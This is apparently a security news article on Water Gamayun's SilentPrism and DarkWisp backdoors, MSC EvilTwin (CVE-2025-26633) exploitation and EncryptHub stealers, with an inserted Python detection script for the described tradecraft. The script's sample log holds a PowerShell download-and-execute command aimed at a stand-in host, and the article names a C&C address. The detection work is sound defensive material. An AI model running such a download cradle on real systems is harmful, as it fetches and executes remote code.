
Threat actors behind the zero-day exploitation of recently patched security vulnerabilities in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp.
The activity is attributed to a suspected Russian threat actor tracked as Water Gamayun, also known as EncryptHub and LARVA-208.
“The threat actor deploys payloads primarily through malicious provisioning packages, signed .msi files, and Windows .msc files, as well as command-execution techniques such as the IntelliJ runnerw.exe,” Trend Micro researchers Aliakbar Zahravi and Ahmed Mohamed Ibrahim said in a follow-up analysis published last week.
Water Gamayun has been linked to the active exploitation of CVE-2025-26633 (aka MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework, to run malware using rogue Microsoft Console (.msc) files.
The attack chains involve provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files, delivering information stealers and backdoors capable of persistence and data theft.

EncryptHub attracted attention toward the end of June 2024 after using a GitHub repository named “encrypthub” to push various malware families, including stealers, miners, and ransomware, via fake WinRAR websites. The threat actors have since moved to their own infrastructure for both staging and command and control (C&C).
The .msi installers used in the attacks masquerade as legitimate messaging and conferencing software such as DingTalk, QQTalk, and VooV Meeting. They are designed to run a PowerShell downloader, which in turn retrieves and executes the next-stage payload on the compromised host.

One such payload is a PowerShell implant called SilentPrism, which can set up persistence, execute multiple shell commands simultaneously, and maintain remote control over the host. Another PowerShell backdoor is DarkWisp, which enables system reconnaissance, exfiltration of sensitive data, and persistence.
“Once the malware exfiltrates reconnaissance and system information to the C&C server, it enters a continuous loop waiting for commands,” the researchers said. “The malware accepts commands over a TCP connection on port 8080. Commands arrive in the format command|.”
“The main communication loop ensures continuous interaction with the server, processing commands, maintaining the connection, and securely transmitting results.”
The third payload dropped in the attacks is the MSC EvilTwin loader, which weaponizes CVE-2025-26633 to run malicious .msc files. The loader is also designed to perform a system cleanup so that it leaves no forensic trail.

Rhadamanthys is far from the only stealer in Water Gamayun’s arsenal. The group has also been observed delivering another commodity stealer called Stealc, along with three custom PowerShell variants tracked as EncryptHub Stealer variant A, variant B, and variant C.
The custom stealers are fully featured malware that collect a wide range of system information, including details of antivirus software, installed software, network adapters, and running applications. They also harvest Wi-Fi passwords, Windows product keys, clipboard history, browser credentials, and session data from various applications related to messaging, VPN, FTP, and password management.
In addition, they focus on collecting recovery phrases for cryptocurrency wallets, specifically singling out files that match particular keywords and extensions.
“These variants exhibit similar functions and capabilities, with only minor modifications distinguishing them,” the researchers noted. “All EncryptHub variants covered in this study are modified versions of the open-source Kematian Stealer.”
One iteration of EncryptHub Stealer is notable for employing a newly observed living-off-the-land binary (LOLBin) technique: it abuses the IntelliJ process launcher runnerw.exe to proxy the execution of remote PowerShell scripts on infected systems.
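The delivery chains described above (a signed .msi launching a PowerShell downloader, mmc.exe opening a rogue .msc file, and runnerw.exe proxying PowerShell) all surface in process-creation telemetry. The following triage script is an added example, not code from Trend Micro or from the threat actor: it parses constructed Sysmon-style process-creation records and flags those three patterns. The log lines, the field layout, and the rule that treats any .msc loaded from outside %SystemRoot%\System32 as suspicious are assumptions for illustration; the article itself does not specify where the rogue .msc files are staged.

```python
"""Process-creation triage for the Water Gamayun tradecraft described above.

Added example (not Trend Micro's or the actor's code). Flags:
  1. runnerw.exe (IntelliJ process launcher) proxying PowerShell
  2. msiexec.exe spawning PowerShell (signed .msi -> PowerShell downloader)
  3. mmc.exe opening a .msc from outside C:\\Windows\\System32
     (heuristic for rogue .msc files; an assumption, not from the article)
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


# Constructed sample records in a key=value layout loosely modelled on
# Sysmon Event ID 1. Paths, users, and the URL are invented.
SAMPLE_LOG = r"""
Image=C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe CommandLine="runnerw.exe powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')" ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\dl.ps1" ParentImage=C:\Windows\System32\msiexec.exe
Image=C:\Windows\System32\mmc.exe CommandLine="mmc.exe C:\Users\victim\AppData\Local\Temp\WmiMgmt.msc" ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\mmc.exe CommandLine="mmc.exe C:\Windows\System32\eventvwr.msc" ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe Get-Process" ParentImage=C:\Windows\explorer.exe
"""

_RECORD = re.compile(r'^Image=(.*?) CommandLine="([^"]*)" ParentImage=(.*)$')
_MSC_PATH = re.compile(r'([A-Za-z]:\\[^"]*?\.msc)(?=\s|"|$)', re.IGNORECASE)
_SYSTEM32 = "c:\\windows\\system32\\"


def parse_events(text: str) -> list[ProcEvent]:
    """Parse one record per line; lines that do not fit the layout are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = _RECORD.match(line.strip())
        if m:
            events.append(ProcEvent(*m.groups()))
    return events


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_runnerw_proxies_powershell(ev: ProcEvent) -> bool:
    # runnerw.exe has a legitimate job (launching IDE run configurations);
    # the signal is runnerw.exe being handed a PowerShell command line.
    return _basename(ev.image) == "runnerw.exe" and "powershell" in ev.command_line.lower()


def rule_msiexec_spawns_powershell(ev: ProcEvent) -> bool:
    # A signed installer that immediately runs PowerShell is the downloader
    # stage described for the DingTalk/QQTalk/VooV look-alike .msi files.
    return _basename(ev.parent_image) == "msiexec.exe" and _basename(ev.image) == "powershell.exe"


def rule_mmc_loads_msc_outside_system32(ev: ProcEvent) -> bool:
    # Heuristic (assumption): built-in consoles live under System32; a .msc
    # opened from a user-writable location deserves a look.
    if _basename(ev.image) != "mmc.exe":
        return False
    m = _MSC_PATH.search(ev.command_line)
    return bool(m) and not m.group(1).lower().startswith(_SYSTEM32)


RULES = {
    "runnerw_proxies_powershell": rule_runnerw_proxies_powershell,
    "msiexec_spawns_powershell": rule_msiexec_spawns_powershell,
    "mmc_loads_msc_outside_system32": rule_mmc_loads_msc_outside_system32,
}


def triage(text: str) -> list[tuple[str, str, str]]:
    """Return (rule name, image basename, command line) for every hit."""
    findings = []
    for ev in parse_events(text):
        for name, rule in RULES.items():
            if rule(ev):
                findings.append((name, _basename(ev.image), ev.command_line))
    return findings


if __name__ == "__main__":
    for name, image, cmd in triage(SAMPLE_LOG):
        print(f"[{name}] {image}: {cmd}")
```

Run against the constructed sample, the first three records are flagged and the two benign ones (eventvwr.msc from System32, PowerShell started from Explorer) are not. In a real deployment the runnerw.exe rule needs an allow-list for developer workstations where IntelliJ legitimately spawns PowerShell, and the .msc rule should be extended to cover the path tricks the EvilTwin technique relies on rather than a plain prefix check.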

Stealer artifacts distributed through the malicious MSI packages or binary droppers have also been found to deliver other malware families, including Lumma Stealer, Amadey, and clippers.
Further analysis of the threat actors’ C&C infrastructure (“82.115.223[.]182”) revealed the use of additional PowerShell scripts to download and run AnyDesk for remote access, and to send Base64-encoded remote commands to the victim machine.
“Water Gamayun uses a variety of delivery methods and techniques in its campaigns, including provisioning malicious payloads via signed Microsoft Installer files and leveraging LOLBins, highlighting its adaptability in compromising victims’ systems and data,” Trend Micro said.
“The intricately designed payloads and C&C infrastructure allow the threat actors to maintain persistence, dynamically control infected systems, and obfuscate their activity.”